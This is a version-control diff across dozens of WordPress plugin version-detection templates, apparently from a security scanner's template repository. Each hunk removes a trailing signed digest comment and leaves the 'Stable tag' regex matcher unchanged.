3946679ef0..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d48073559ca6d2bf26ed0feb7515533df5aa6002deee69f518a381d69f828f20220273f1efa467c026b837de742fc6d6754be7fdbe18b1e5795d3a83cbcc35f1684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 7646d558fa..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042db7265d11e09dbee913869038ba4f9fe9f8464d9679027de51c2993373020902210086c6cea63e1e177b076cdff1acc724194a6a14088a7cc23967741169f7fe48a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index ab5ca59280..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b9617f27fa92115a80ca9da20848fa46c2f25103a9c4a1e22177eb67be757537022100cc9d1454449d6c91da369b3863340a5290a2a34ad57f21810ca3a526017acb10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 421673c096..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d91ce5255534bffd34a5e3239167fe83bf40dcb95fd6245cae0e553dc72296480220758155e1416e0ed73399780ac75aed4292c5ff824171e511f1b0a7c9dc2d6e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 6eb30fd7f0..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220601702d04588f07db38e642654716d8f206325c06f58f540397fb5466d4e82a4022100c7c8d997f7da92fc188fdaa2f7d773dd7093f8dd486dd30526a42005bdc26ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 286007c3bd..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220444d8de7d9229f03b7583a950ae74142bf8e6d103c168fb23806bbf201947dfc02204af79aa43c8eba13e8d1af961e9aa5ad03670672c9391b3dad44514332e9d815:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index b6ea3dc6d6..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9a3052ea93ff4b09992a37aec9f17d12057b6b3054339fc40be40cd22feb1b8022100850246f00c3591e52ef195ffd30e225d9168b9bc5b0603b43c19802ba0ae076f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 0a9a24e50e..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a17694fbefa81339cfe55d2599e48fc285c895e84f9e301c2dae8772f1480bab02203b947e4f2efd40931324b4ac8531f5d31bc67019328e3b64589ddca81d4dc0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2fd8370fa3..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2bf210575e9ef8e5c3cc5316b6ffbf7a4d44b4a739dccec315fd9b2e1a6dace02200df31d311349c57915ef7fab039ab301f32e37ee87897ccbf7e2d58701e2e102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 18d8b41a9f..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045bd58a52effec97daac06abcd8aaf5417a7f5cc195480151c0a7c313981f76602206ed679174e66cb83b05144f2bcdd69761f7e82256010e793debbcdf4b4523615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 8825d9958f..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a82d469c129b6769d3356eb953920112aaf18666c7ed801a352d5d89b6dc662022100b61bf1ca727ba8ac0e8c5174eb241ebb47ddb084452fe87656628b742f5aeb50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index afc003f030..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b3d6e307f5cd5b787612f08b322ca31db5a282cd3c25c954fcd117fff8c7de4022100a934ce261578e6b3f91f49b7545b8f3b13b7bb7a937d5daeff7623fc43c83272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 86d18e3587..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100842239fcd3c98018439e7e16e4febc8e717848d3fff21f892e69f3ef4b37717d0220035b71f190d282ccabe8a717703a009c2ae2577853cbd570a3e36f22ea427c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 289213ee86..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073a08da40e218ef34b9d80c7602e8fd39b7d1d921fded1fe5153cfa4a258e03f022100ea6a0400e0097ab647b8b8c2eadc3b25803c6fdf515a2b4e6260d698ca73b4d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b75eeee595..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022019af0547cb289e5dce10c4dd120aed10a15bb9fb7113b3a8143a237251007669022100dfcde75be5c58ea063d2aa446cc8de8b15795645fe22b481142a4afcfee531d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 71e8f542f9..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b43a5f736f62616ef27a4dc5ebaa629a0c4b1150c99a71fbf3eabbd36602f5230221008b701f8bef6cc0fba86820381993ff8399746a0f476cd9dd40e62b69354a2287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index a1681b3928..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d17edb827d5cc588b871f82f57153d053c57d285cc78d1c4314ba91723ec6d2022078390cfa48523f0e35d53a8a2504c9c8d0ed89028a2089c2e982e9464d3dd33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index fb5cde63a6..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201cc9d2b699cf29dd41d2686d80beab3f10424d8205d4040083a8ee02ab3e0170022072878d66f8783d3e8087c4796fbb233034111bae0ebff1c4f3bba0d454a9f4b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 4c6fb0dd10..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054c5aedf0011bfa6e093963ed15c52596becaecb6334e1633672d0d314e4c8410221008136b2df879d9eece952c2516964308670e30b79463610b0603db4b101dc83f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index a580d9e186..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c1dfdc5f15d9f1686c0c8c591762ff68a519e0801be7760249c411f5fbaaa6f4022100c23de6ad3a48454bab94a2e7d79cc01d6fc96f38aa7bb0946818d357cdd2d4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index b6830ea822..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d168734ec4618f9f49b38a93033dcebe8f04964ed26902eb0d3ffb6083a2bf7022100c2b070e6db8e783906504a93cca35ae2c0192e47303c6f9886e19bc4025e9446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index c1c35326c5..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220495ae15e7df96ece72dfc6cc386b28528af6e9f0064e08900b3aa6921fde10320221009a2cbd9fa83ac9192459b773134792fdf1c305ff3502d9917225a9b0e574a9d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 76f7fb6e81..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ebbefc6a807c6bd23bd86dab3c89001c3ec5f6faf5308d73b274cad34e303084022100a57728567639f3f3b088e87f145e715ed47e03e79ec4e493c04d4c9b8ac322bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3a8c1a73c9..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f214fedc5691c5f4f46c0beec33a5dfd20b4e16074133aef7418b87fe6c778df022100dc4c407f7fd6fd1a732e8a31ad7d1c9ff3af11481fe5c643150ffbd3d5b47da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index daa2ba2547..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100827b956a9673a995b253e21984263497fdde523996c59486d8b4813f45dc3042022077995ce60b9e594b2a45c5fbd0b616cfea17eaa6dade3c8be8d7ef8bbbead67c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index b5965fc47a..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c926682eda0d1ec2094d5a3d7ef51dd7cdbb925397561b2509f620faf57da46e0220158df0846885639d1bf89aca9455f03c7e0ff68c47b75a03e52b52bc7449737b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 31b78c1001..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066969876bd10d9d3822ab2f8a81e4d4ac763f6b149333eeda47f91fd95dee7050221008cd7f91c0fd7bcb9b5177d0609312f78bbbff6473a2894a3b3721f0b03e51f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 951de8fae7..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d76b0eb30f95f7d0aab9205860c5568a9c80a2e6d732a23f8706a8b4e2f27f98022100e0472eff48ecc40a91321697c3835fc79e37f6210a0290c055a2fa5a3aa61fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 926b44710e..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f22364981930645b2766d96613990f3d7682768309f5ce258fa3232dcb5b3fe0220125e4ca0af062e997fa18de2645d225e7371ddb69b2e3a4ee8a3711dcf8565f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f999406c15..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8fa2ec7428d73441e7f6797644e0bbb77f3b2956220f0070ff22dc4c602ee94022100fde16dbcaf9829feddb4113e946e29741098e397a5c0e795d4dbb28e9913e5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 66b59892f6..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d26e6b6e82198049fd0ca9284ccae5d4ff4227a760a20925c41aa4c77aa445402203c4e374726dc71c773f33a060752f594ecab08516268f61e21ebdd841ed5a28b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index aa5a9f3b66..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202395cb44bd98157ab913f454ee4c4732d1b5bfdfef49345b98e34f4c929f36a2022100f06272ba06f67cb359a1ee58f85c91b97d38d90ee96197e36c482b655b3d6123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 8c7b54907f..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009f31cb01e4818d964a774af34724aa478b1dd7a14f1426e9f6d86b120a87259a022100a1b6ba6f6fb3483c5b7ddcb168bab7e0d95c3483d9d3c3ddebfb4a03fe7b810b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 5586c86a4b..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207aaa8650e6f5eea5ef930878653fd37c72126fc4dbbd5705484122c69665935a02207404cb8bc7fb9ff5cdaf80a7fb8379103c6428e7298c8ebc00673987f89bcd39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 758c2635a6..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e165bdcfbb3a2534ddea231f7991bf8f6da6930924c0e6139d5d531d3bfc4ec6022054d719d9db13e1c9126f54f2880f175f65d56ff7dee08edbce02963376d20e79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index e4f1eb1ade..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039073a52eee935e90fe124ad5239cd9a79b963e47d3bc6acc249be84b56dc6fb0221008c2206b997e337b40899bd057c6acc03885d082d2877d9885eef0ab1040d9311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 4821e31edd..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021babc508465fe461b8deef9c11b77c71552f670b401e3a17ad2dae4ea7c88530221009748b95ea42a0b91fc7233bfacbc72d45d75a56e7df7ac4a57fd1bbc4e2838b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index a76970fee6..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7cb7329908a8b83faf3fd8624093ff6461a566d5b54dd34e06e1bf023bf140002204b052066c66b65e216cd6c7ee5e28cf94a886240ae18ea6db173a435cdb9f4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87954545c0..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075f5b959c2e7f2a0c053dc461f3abb786070e7bde321abf6710e501cd7230d560221008ca79e1a039e1395adcba2f2e1188b11acc6ddf1f963e6590fec046e81f6d6b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index f101ea6c12..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eec11a25312a99952471dad21b82222eb9ada030fe0689cdb0387fc86d01477902207a215b102d2ff6976028ba03f0b936e9508d61e6af7f3aa21024d631acd5c4d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 376634e9ee..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043b30e3194fb083568090154c57f1ccb6d8647420104900367ecda8cef59cf7302200af2d2319790f8304f20f9b920cb0a76fb04309cb96c79cee1ed288ed2141f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8cc417afa1..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078fe92a874fd33856fd3fd22b8f08cfe8277ced883305a8ef4d9b06d35d5b02e02206ae9b5fafebd63dc0626200b2173198e2b68663ece3395b0d402e009aa5e8aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 671b14e3c8..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f62fa3cfa2497a9724e9787b969cfc53202776c734888ca0c939a8787125089022100fd741eb36575d578913a8779adb2c8287ea6bef4145c4cbde6fc194fc7cbcd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 67741836fb..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be7cf4d7bc6b5c9e5fdc21d5d87fec46eb6d03edac3dca684cf60f22eb906306022100a44e6fcb27558910001c6e5bcf70049326420aa1c816acc90b8a17dc9956f621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 8beaf781d9..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039d351f6f33b96431b797d970968a48a2ef97c3fd78991247ceed4c542e726ba02205addd102cb9baec098d5f34721108277380d298fbc10ae0d643b6fb5ba260016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 29bc7cf3eb..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4612fec6b6ce7b75bb9e224a59481c6fcc859d2620f54583ae907ec9cc0efcb02210080032b30c82439f8069f651dcdf69688af14f9c3684121b31a2078ace188273c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index a1f72f6c94..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022067d5e2ecb50808e7bd42f9d8a3805b412ddbac2221fa9a9272d59a45a25299e2022100c60a428f8d6a7c5b5e7eb515145d72886ffc593a7bb6da54d3bfb3afafb9650a:922c64590222798bb761d5b6d8e72950 